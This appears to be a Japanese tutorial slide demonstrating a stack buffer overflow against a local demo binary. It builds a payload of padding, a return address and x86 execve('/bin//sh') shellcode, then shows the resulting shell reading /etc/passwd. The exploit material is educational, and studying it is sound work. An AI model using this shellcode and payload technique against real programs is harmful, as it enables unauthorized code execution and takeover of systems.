攻撃の方法 - 任意コード実行

  ( '-') python -c 'print "x"*76 + "\xd0\xd4\xff\xff" + \
   "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xf2\xb0\x0b\xcd\x80" \
   ' > shine

すごく不穏なファイルを作ります

 ( '-') cat shine /dev/stdin | ./a.out
 ls -l /etc/passwd
 -rw-r--r-- 1 root root 2038 Jan 14 14:00 /etc/passwd

shell 取れました